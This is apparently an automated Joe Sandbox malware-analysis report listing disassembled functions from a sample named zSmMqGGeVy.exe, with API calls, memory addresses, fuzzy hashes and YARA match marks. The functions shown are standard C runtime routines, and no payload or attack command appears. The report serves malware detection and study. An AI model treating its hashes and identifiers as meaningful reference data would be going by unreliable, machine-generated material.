                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                                  • Instruction ID: 52538b18816049bcedc1269911990ba1ec418b01f35f7c97631a1a3369067357
                                                  • Opcode Fuzzy Hash: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                                  • Instruction Fuzzy Hash: BE11E33AA006566AF242D674DC81E6F328BEBC92F57310134F528921D9DE74DE094631
                                                  Function 00411354 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,0040C33E,004124E1,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?), ref: 00411359
                                                  • _free.LIBCMT ref: 004113B6
                                                  • _free.LIBCMT ref: 004113EC
                                                  • SetLastError.KERNEL32(00000000,00000008,000000FF,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004113F7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
                                                  • Instruction ID: 755f6b258ceaa8e65099160f8bc9def63f750f9b951ab46e134be7d7a93c0062
                                                  • Opcode Fuzzy Hash: a225b34e5669a597189d7f1afa456a980380f95de764cdce8a1da94a10b7a370
                                                  • Instruction Fuzzy Hash: AD11CA317005042BA611277A6C82EEB16598BC13B8B64033BFF24821F1EA2D8C92411D
                                                  Function 00EA15BB Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,00E9C5A5,00EA2748,?,?,00E9A3C2,?,?,?,00E91353,?,00E9370E,?,?), ref: 00EA15C0
                                                  • _free.LIBCMT ref: 00EA161D
                                                  • _free.LIBCMT ref: 00EA1653
                                                  • SetLastError.KERNEL32(00000000,0042A174,000000FF,?,00E9A3C2,?,?,?,00E91353,?,00E9370E,?,?,?), ref: 00EA165E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
                                                  • Instruction ID: 03fc7f97e1590df41708fc5d9f62a4c6397b930e31748a831468c092e832dfe9
                                                  • Opcode Fuzzy Hash: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
                                                  • Instruction Fuzzy Hash: EF114C32B041002BD62222B96C86E3A269A8BCF378F6433B4F524FE1E1DF61AC115115
                                                  Function 10006FF3 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,1000592B,10007A62,?,?,100066F0), ref: 10006FF8
                                                  • _free.LIBCMT ref: 10007055
                                                  • _free.LIBCMT ref: 1000708B
                                                  • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,1000592B,10007A62,?,?,100066F0), ref: 10007096
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free
                                                  • String ID:
                                                  • API String ID: 2283115069-0
                                                  • Opcode ID: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                                  • Instruction ID: 7e0a2054198a3f627b51ebbd791d94cb99ce3d76a099f8cfcb9b0e2a4681bd24
                                                  • Opcode Fuzzy Hash: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                                  • Instruction Fuzzy Hash: B8110236E00514AAF352C6748CC5E6F328AFBC92F17210724F52C921EADE79DE048631
                                                  Function 00E9C07E Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00E9C13F,?,?,0042B000,00000000,?,00E9C26A,00000004,0041EAFC,0041EAF4,0041EAFC,00000000), ref: 00E9C10E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                  • Instruction ID: d27cce08484774a2471a312ad52881d65d23ddc4b991de5b7fa41a9d435448aa
                                                  • Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
                                                  • Instruction Fuzzy Hash: D5110271E41221EBCF32AB699C44B9E37A4AF067A4F314220FD15FB280D770ED4086E8
                                                  Function 0041AE22 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000), ref: 0041AE39
                                                  • GetLastError.KERNEL32(?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000,?,004185FC,00000000), ref: 0041AE45
                                                    • Part of subcall function 0041AE0B: CloseHandle.KERNEL32(FFFFFFFE,0041AE55,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000,00000000), ref: 0041AE1B
                                                  • ___initconout.LIBCMT ref: 0041AE55
                                                    • Part of subcall function 0041ADCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041ADFC,0041AABC,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041ADE0
                                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0041AACF,00000000,00000001,00000000,00000000,?,004180A8,00000000,00000020,00000000,00000000), ref: 0041AE6A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  • Opcode ID: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                  • Instruction ID: ee4a97f4c5e0560d025622a6e285d837d398bf1ce1ecb10de8e4d9e98fca97b7
                                                  • Opcode Fuzzy Hash: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                  • Instruction Fuzzy Hash: 26F0F836942214BBCF222F929C049CA3F26EF087A5F054025FA0985130C63689B19B9A
                                                  Function 00EAB089 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00EAAD36,00000000,00000001,00000000,00000000,?,00EA830F,00000000,00000000,00000000), ref: 00EAB0A0
                                                  • GetLastError.KERNEL32(?,00EAAD36,00000000,00000001,00000000,00000000,?,00EA830F,00000000,00000000,00000000,00000000,00000000,?,00EA8863,?), ref: 00EAB0AC
                                                    • Part of subcall function 00EAB072: CloseHandle.KERNEL32(0042A930,00EAB0BC,?,00EAAD36,00000000,00000001,00000000,00000000,?,00EA830F,00000000,00000000,00000000,00000000,00000000), ref: 00EAB082
                                                  • ___initconout.LIBCMT ref: 00EAB0BC
                                                    • Part of subcall function 00EAB034: CreateFileW.KERNEL32(004265E8,40000000,00000003,00000000,00000003,00000000,00000000,00EAB063,00EAAD23,00000000,?,00EA830F,00000000,00000000,00000000,00000000), ref: 00EAB047
                                                  • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00EAAD36,00000000,00000001,00000000,00000000,?,00EA830F,00000000,00000000,00000000,00000000), ref: 00EAB0D1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  • Opcode ID: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                  • Instruction ID: ddab785fa5a1b629b46ce885fa83c425c72e72e18a0fddbadd3975bec7588fd5
                                                  • Opcode Fuzzy Hash: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
                                                  • Instruction Fuzzy Hash: B3F01C36911114FBCF222F91DC0899A7F66EF0D7A4F054420FA19AA131D7329961DB95
                                                  Function 1000CD22 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
                                                  • GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45
                                                    • Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B
                                                  • ___initconout.LIBCMT ref: 1000CD55
                                                    • Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0
                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  • Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                  • Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
                                                  • Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                  • Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90
                                                  Function 004091F8 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SleepConditionVariableCS.KERNELBASE(?,00409195,00000064), ref: 0040921B
                                                  • RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409225
                                                  • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409195,00000064,?,?,?,0040104A,0042BB40), ref: 00409236
                                                  • RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040923D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                  • String ID:
                                                  • API String ID: 3269011525-0
                                                  • Opcode ID: 6ea53ab934fb8a3dcf50dd5c11f10886be54903c7cc97662d191e9518fa7b0c1
                                                  • Instruction ID: 40c2fce60939aafa0776eae2e2369d18d4b8ec69fabe1ce25dfd7c9304a85116
                                                  • Opcode Fuzzy Hash: 6ea53ab934fb8a3dcf50dd5c11f10886be54903c7cc97662d191e9518fa7b0c1
                                                  • Instruction Fuzzy Hash: 67E092B1B40234BBCB112B90FE08ACD7F24EB0CB51B458072FD0666161C77D09228BDE
                                                  Function 00410A46 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00410A4F
                                                    • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                    • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                  • _free.LIBCMT ref: 00410A62
                                                  • _free.LIBCMT ref: 00410A73
                                                  • _free.LIBCMT ref: 00410A84
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 7b30c710dcdd7188d0b07851f7036ca18a8931f72254c168f329d64b926ff840
                                                  • Instruction ID: 4f604ca58aada12d27b251242fa97a7c83cac521b99ee6611507b97af23f288b
                                                  • Opcode Fuzzy Hash: 7b30c710dcdd7188d0b07851f7036ca18a8931f72254c168f329d64b926ff840
                                                  • Instruction Fuzzy Hash: 46E0EC71B13360AA8632AF15BD41589FFA1EFD4B543C9003BF50812631D73909939BCE
                                                  Function 00EA0CAD Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00EA0CB6
                                                    • Part of subcall function 00EA1D29: HeapFree.KERNEL32(00000000,00000000,?,00EA72DB,?,00000000,?,?,?,00EA7302,?,00000007,?,?,00EA75E1,?), ref: 00EA1D3F
                                                    • Part of subcall function 00EA1D29: GetLastError.KERNEL32(?,?,00EA72DB,?,00000000,?,?,?,00EA7302,?,00000007,?,?,00EA75E1,?,?), ref: 00EA1D51
                                                  • _free.LIBCMT ref: 00EA0CC9
                                                  • _free.LIBCMT ref: 00EA0CDA
                                                  • _free.LIBCMT ref: 00EA0CEB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                                  • Instruction ID: 60218b3685060683145af14b4f0830ae04012e8d7c5a9f99af151c2e3982c399
                                                  • Opcode Fuzzy Hash: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
                                                  • Instruction Fuzzy Hash: DBE0EC79A133349A86366F14BD41449FFAAEBDDB117862076F4202A231C73225539BCF
                                                  Function 100067E8 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 100067F1
                                                    • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                    • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                  • _free.LIBCMT ref: 10006804
                                                  • _free.LIBCMT ref: 10006815
                                                  • _free.LIBCMT ref: 10006826
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                                  • Instruction ID: 2a5a278bef7b5ad6e03033ca92f6b3e0bb2fc7991e1f46602c590ec50041d4ba
                                                  • Opcode Fuzzy Hash: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                                  • Instruction Fuzzy Hash: FBE0E675D10131BAF711EF249C8644E3FA1F799A503068015F528222B7C7369751DFE3
                                                  Function 0040F8ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 0040F97D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorHandling__start
                                                  • String ID: pow
                                                  • API String ID: 3213639722-2276729525
                                                  • Opcode ID: 31981e0ef883c4d92876c0cf8fbbce67339a08b3983a5bf5b0a922faacb7e412
                                                  • Instruction ID: a4333340e488540e58a7cc811cab45b4078f0fd2139a3ee8952107b79a1fd4b1
                                                  • Opcode Fuzzy Hash: 31981e0ef883c4d92876c0cf8fbbce67339a08b3983a5bf5b0a922faacb7e412
                                                  • Instruction Fuzzy Hash: C15190B1B08601E6CB317718C9413EB6BD09B80701F64497BE495527E9EB3C8CDA9E8F
                                                  Function 0041017D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                  • API String ID: 0-201830514
                                                  • Opcode ID: 071b538174e6ec2062faa24906a4cfa7e50636e93d54360a723864c0abc3d007
                                                  • Instruction ID: ef1b21c86d4c641325268a2e562e5aacaa8476dc5588200f607cc18d3bf73bc2
                                                  • Opcode Fuzzy Hash: 071b538174e6ec2062faa24906a4cfa7e50636e93d54360a723864c0abc3d007
                                                  • Instruction Fuzzy Hash: A8416471E00214ABCB219B999C85AEFBBF8EFD4350B1440ABF50497251D7B99EC1CB98
                                                  Function 00EA03E4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                  • API String ID: 0-201830514
                                                  • Opcode ID: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
                                                  • Instruction ID: e4c6bf85c97690b13e37909381149b42a89d6b760b23e3eac4b4a46238eac9b9
                                                  • Opcode Fuzzy Hash: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
                                                  • Instruction Fuzzy Hash: 0F415171E00218AFCB21EF999C819AEBBF9FBCE314B141066F515BB211D770AE41CB94
                                                  Function 10006038 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                  • API String ID: 0-201830514
                                                  • Opcode ID: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                                  • Instruction ID: cc2ecb4b5d0b55cd4a25e2381517e3645a439caaa5f14caae8cc7f97f4731dcb
                                                  • Opcode Fuzzy Hash: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                                  • Instruction Fuzzy Hash: 9241AD75E00215BBEB11CB99CC8199FBBF9EF89390B244066F901A7216D6719B80CB90
                                                  Function 00E9AE47 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00E9AE86
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00E9AF3A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 3480331319-1018135373
                                                  • Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                  • Instruction ID: 788704a3b759b95209b2792d3bf6f85986482f8f8b59a2f0d1916cba5ad8a508
                                                  • Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
                                                  • Instruction Fuzzy Hash: 6641A474A002189BCF10DF68C884ADEBBF5AF45318F189165EC14BB352D7359E55CBD2
                                                  Function 0040B485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 0040B4AA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2118026453-2084237596
                                                  • Opcode ID: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                  • Instruction ID: 67f376c023d9800a5206fdaf198d645220277734bcfb559d46511f35e7f4eabb
                                                  • Opcode Fuzzy Hash: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                  • Instruction Fuzzy Hash: 95415871900209AFDF15DF94CD81AAEBBB5EF48308F1480AAFA1576291D3399A50DB98
                                                  Function 00E9B6EC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 00E9B711
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2118026453-2084237596
                                                  • Opcode ID: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                  • Instruction ID: 815ec471a6f85450fe98432e4f65694779e907cb91ec80a44ac933ea9ecbda34
                                                  • Opcode Fuzzy Hash: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
                                                  • Instruction Fuzzy Hash: 66419B72900209AFCF25CF98DE81AEEBBB5FF48308F189169F904B7211D3359950CB51
                                                  Function 100044D6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • EncodePointer.KERNEL32(00000000,?), ref: 100044FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2118026453-2084237596
                                                  • Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                  • Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
                                                  • Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                  • Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55
                                                  Function 10009174 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 100091D6
                                                  • _free.LIBCMT ref: 10009204
